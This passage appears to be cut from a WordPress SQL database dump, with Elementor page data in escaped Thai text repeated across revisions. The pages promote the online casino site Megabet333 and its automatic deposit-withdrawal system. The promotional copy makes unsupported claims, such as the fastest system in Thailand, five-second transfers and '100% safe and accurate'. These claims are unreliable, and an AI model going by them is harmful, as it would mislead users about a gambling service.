\\u0e41\\u0e25\\u0e30\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e17\\u0e22\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e34\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e08\\u0e32\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a Megabet333 \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e2a\\u0e25\\u0e34\\u0e1b\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e35\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e49\\u0e32\\u0e40\\u0e1a\\u0e17\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e19\\u0e33\\u0e14\\u0e49\\u0e32\\u0e19\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a API \\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33 100% \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e13\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e2d\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e41\\u0e2a\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e27\\u0e25\\u0e1c\\u0e25\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(883,120,'_elementor_edit_mode','builder'),(884,120,'_elementor_template_type','wp-page'),(885,120,'_elementor_version','3.32.5'),(886,120,'_elementor_pro_version','3.32.3'),(887,120,'_wp_page_template','default'),(888,120,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(889,120,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"355\\\" data-end=\\\"698\\\">\\u0e43\\u0e19\\u0e22\\u0e38\\u0e04\\u0e19\\u0e35\\u0e49 2025 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e22\\u0e38\\u0e04\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e40\\u0e25\\u0e22\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32 \\u0e22\\u0e38\\u0e04\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 megabet\\u00a0\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22\\u0e40\\u0e0a\\u0e48\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e17\\u0e22\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e34\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e08\\u0e32\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a Megabet333 \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e2a\\u0e25\\u0e34\\u0e1b\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e35\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e49\\u0e32\\u0e40\\u0e1a\\u0e17\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e19\\u0e33\\u0e14\\u0e49\\u0e32\\u0e19\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a API \\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33 100% \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e13\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e2d\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e41\\u0e2a\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e27\\u0e25\\u0e1c\\u0e25\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(892,121,'_elementor_edit_mode','builder'),(893,121,'_elementor_template_type','wp-page'),(894,121,'_elementor_version','3.32.5'),(895,121,'_elementor_pro_version','3.32.3'),(896,121,'_wp_page_template','default'),(897,121,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(898,121,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"355\\\" data-end=\\\"698\\\">\\u0e43\\u0e19\\u0e22\\u0e38\\u0e04\\u0e19\\u0e35\\u0e49 2025 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e22\\u0e38\\u0e04\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e40\\u0e25\\u0e22\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32 \\u0e22\\u0e38\\u0e04\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 megabet\\u00a0\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22\\u0e40\\u0e0a\\u0e48\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e17\\u0e22\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e34\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e08\\u0e32\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a Megabet333 \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e2a\\u0e25\\u0e34\\u0e1b\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e35\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e49\\u0e32\\u0e40\\u0e1a\\u0e17\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e19\\u0e33\\u0e14\\u0e49\\u0e32\\u0e19\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a API \\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33 100% \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e13\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e2d\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e41\\u0e2a\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e27\\u0e25\\u0e1c\\u0e25\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/3icon_-_Megabet333-Biz.webp\",\"id\":50,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c Megabet333 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 Megabet333 \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 Megabet333<\\/strong><\\/span><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong 